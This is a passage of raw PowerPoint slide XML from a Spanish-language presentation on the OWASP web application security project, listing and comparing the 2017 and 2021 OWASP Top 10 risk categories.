              <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:endParaRPr lang="es-ES" sz="1800" b="1" dirty="0">
              <a:solidFill>
                <a:srgbClr val="B31166"/>
              </a:solidFill>
              <a:latin typeface="Century Gothic" panose="020B0502020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>O</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pen </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>W</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>eb </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0" err="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>A</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0" err="1">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>pplication</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1800" dirty="0">
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>S</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>ecurity </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" b="1" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>P</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" dirty="0">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>roject</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="4" name="Imagen 3">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{2947D28B-1A23-3613-9216-B1EE7BB32CC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvPicPr>
            <a:picLocks noChangeAspect="1"/>
          </p:cNvPicPr>
          <p:nvPr/>
        </p:nvPicPr>
        <p:blipFill>
          <a:blip r:embed="rId5"/>
          <a:stretch>
            <a:fillRect/>
          </a:stretch>
        </p:blipFill>
        <p:spPr>
          <a:xfrm>
            <a:off x="4518934" y="1276220"/>
            <a:ext cx="6687897" cy="4288085"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
      </p:pic>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="5" name="Rectángulo: esquinas diagonales cortadas 4">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76665C3B-13E9-A820-13C2-6D6CC8083C57}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="788738" y="2831429"/>
            <a:ext cx="2636865" cy="2156781"/>
          </a:xfrm>
          <a:prstGeom prst="snip2Diag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a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>OWASP Top 10 </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>es un informe de los diez riesgos de seguridad más importantes en aplicaciones web y es actualizada cada 3 o 4 años.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="7" name="CuadroTexto 6">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{CEB3CC93-226A-EBA0-4140-0E4600626DC5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="674205" y="5507945"/>
            <a:ext cx="3374572" cy="338554"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
          <a:ln>
            <a:solidFill>
              <a:schemeClr val="tx1"/>
            </a:solidFill>
          </a:ln>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="square" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="es-ES" sz="1600">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Referencia: </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600">
                <a:latin typeface="Trebuchet MS" panose="020B060302020202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OWASP Top 10</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="es-ES" sz="1600">
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
                <a:cs typeface="Calibri" panose="020F0502020204030204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>.</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="9" name="Imagen 8" descr="Interfaz de usuario gráfica&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{F70E08DC-7862-904F-D4BC-849AA3DEAF66}"/>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420615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6467-159C-FBF1-2D0D-589331AA103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DD4010B-8D2E-7B1B-9A0A-0C4317FBBAF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361D112-4756-BA09-4ADE-9934283D0E5B}"/>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OWASP Top 10</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:pic>
        <p:nvPicPr>
          <p:cNvPr id="20" name="Imagen 19" descr="Texto&#10;&#10;El contenido generado por IA puede ser incorrecto.">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C784E87B-A4FD-5130-C42C-8FC07650A00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8" name="Rectángulo 7">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{DA69BA8B-1753-9472-3E15-3D42DE379BF8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4743651" y="1296008"/>
            <a:ext cx="2432236" cy="4796809"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:solidFill>
            <a:srgbClr val="009D89"/>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9" name="CuadroTexto 8">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{76E9267C-44D6-2E0C-C71D-0387D3005D4E}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819353" y="1296008"/>
            <a:ext cx="4052778"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a:rPr>
              <a:t>Inyección</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="10" name="CuadroTexto 9">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{060DF037-0F57-DDE2-6BCE-F9A16D2B60B1}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819355" y="1773222"/>
            <a:ext cx="4052776"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panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Autenticación rota</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="11" name="CuadroTexto 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{693FAEFC-7EDD-5D62-FFAB-5B5D6F63822B}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819353" y="2250436"/>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panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Exposición de datos sensibles</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="12" name="CuadroTexto 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{7E833062-3124-A2BC-47D3-078B39C2A321}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819353" y="2727650"/>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Entidades externas XML</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="CuadroTexto 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E364179-F7DF-57FE-0255-8049F0C210D3}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819353" y="3204864"/>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Control de acceso roto</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="14" name="CuadroTexto 13">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{46769288-F55B-DFE5-2FB6-450B2CE6DA43}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819353" y="3682078"/>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Desconfiguración de la seguridad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="15" name="CuadroTexto 14">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{5B3B6A9A-4A75-CBA7-1696-B1FFC6BC90DE}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819353" y="4159292"/>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Cross-Site Scripting XSS</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="16" name="CuadroTexto 10">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{511491F0-D7C9-D798-9A85-9DC33B9A1DD5}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819353" y="4636506"/>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Deserialización insegura</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="17" name="CuadroTexto 11">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6E4F6E49-DD2B-8569-78EF-68A6FE5A65AD}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819353" y="5113720"/>
            <a:ext cx="4052781" cy="52322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Uso de componentes con vulnerabilidades conocidas</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="19" name="CuadroTexto 12">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{273FA6AF-BB46-2CF6-4147-C4C7BC85BE35}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="819356" y="5806375"/>
            <a:ext cx="4052778"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Registro y supervisión insuficientes</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="21" name="CuadroTexto 16">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B25A539F-2466-56A8-1EA7-734747529E9A}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7329332" y="1530826"/>
            <a:ext cx="4052778"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a:rPr>
              <a:t>Control de acceso roto</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" kern="0" dirty="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="22" name="CuadroTexto 17">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{3F1ED9B9-A8D2-8973-869D-71253B3E325F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7329335" y="2067090"/>
            <a:ext cx="4052776"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panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Fallos criptográficos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="23" name="CuadroTexto 18">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{869816E4-CAA7-98AB-E05C-5B646738BE25}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7329332" y="2603354"/>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panose="020B0502040204020203" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>Inyección</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="24" name="CuadroTexto 19">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{A8420DA8-1F04-0AE1-51CE-CCE7525F13D2}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7329332" y="3139618"/>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a:rPr>
              <a:t>Diseño inseguro [NUEVA]</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="25" name="CuadroTexto 20">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6048E730-608B-0F6A-E81C-772658F82E62}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7329332" y="3881348"/>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Desconfiguración de la seguridad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="26" name="CuadroTexto 21">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{6A8F690E-95CA-34BF-7403-81BA58D69931}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7309768" y="3507691"/>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Componentes vulnerables y obsoletos</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="27" name="CuadroTexto 22">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{04453C29-EEFE-46AC-3262-D8F6E36C1409}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7309768" y="4220069"/>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Fallos de identificación y autenticación</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="28" name="CuadroTexto 23">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{369E12A5-260F-DADE-34D0-08F598F9A055}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7309768" y="4580219"/>
            <a:ext cx="4052781" cy="52322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a:rPr>
              <a:t>Fallos en la integridad del software y de los datos [NUEVA]</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="29" name="CuadroTexto 24">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{8A1DD007-8C41-0BA6-94CC-C8D315602878}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7309768" y="5099320"/>
            <a:ext cx="4052781" cy="52322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Fallos en el registro y la supervisión de la seguridad</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="30" name="CuadroTexto 25">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{C119A7EF-9618-C1A7-707D-1616C6170BB8}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7309771" y="5569597"/>
            <a:ext cx="4052778" cy="52322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a:rPr>
              <a:t>Falsificación de solicitudes del lado del servidor [NUEVA]</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" sz="1400" kern="0">
              <a:solidFill>
                <a:srgbClr val="000000"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              <a:cs typeface="Segoe UI" panose="020B0502040204020203" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="31" name="5 Título">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{D481578C-E1F2-E11E-C827-28BDE79EDD9F}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1198665" y="940500"/>
            <a:ext cx="3347564" cy="495672"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="914398" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="2800" b="1" i="1" kern="1200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Georgia" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2017</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="32" name="5 Título">
            <a:extLst>
              <a:ext uri="{FF2B5EF4-FFF2-40B4-BE49-F238E27FC236}">
                <a16:creationId xmlns:a16="http://schemas.microsoft.com/office/drawing/2014/main" id="{B6941856-1B5B-B652-D4B5-6BD8B3843111}"/>
              </a:ext>
            </a:extLst>
          </p:cNvPr>
          <p:cNvSpPr txBox="1">
            <a:spLocks/>
          </p:cNvSpPr>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="7752868" y="952234"/>
            <a:ext cx="3347564" cy="495672"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr lIns="91440" tIns="45720" rIns="91440" bIns="45720" anchor="t">
            <a:normAutofit/>
          </a:bodyPr>
          <a:lstStyle>
            <a:lvl1pPr algn="l" defTabSz="914398" rtl="0" eaLnBrk="1" latinLnBrk="0" hangingPunct="1">
              <a:spcBef>
                <a:spcPct val="0"/>
              </a:spcBef>
              <a:buNone/>
              <a:defRPr sz="2800" b="1" i="1" kern="1200" baseline="0">
                <a:solidFill>
                  <a:schemeClr val="tx1">
                    <a:lumMod val="75000"/>
                    <a:lumOff val="25000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="Georgia" pitchFamily="18" charset="0"/>
                <a:ea typeface="+mj-ea"/>
                <a:cs typeface="+mj-cs"/>
              </a:defRPr>
            </a:lvl1pPr>
          </a:lstStyle>
          <a:p>
            <a:pPr algn="ctr"/>
            <a:r>
              <a:rPr lang="es-ES" sz="1800" i="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="tx1"/>
                </a:solidFill>
                <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
              </a:rPr>
              <a:t>2021</a:t>
            </a:r>
            <a:endParaRPr lang="es-ES" dirty="0">
              <a:solidFill>
                <a:schemeClr val="tx1"/>
              </a:solidFill>
              <a:latin typeface="Trebuchet MS" panose="020B0603020202020204" pitchFamily="34" charset="0"/>
            </a:endParaRPr>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:cxnSp>
        <p:nvCxnSpPr>
          <p:cNvPr id="33" name="Conector recto de flecha 32">
            <a:extLst>
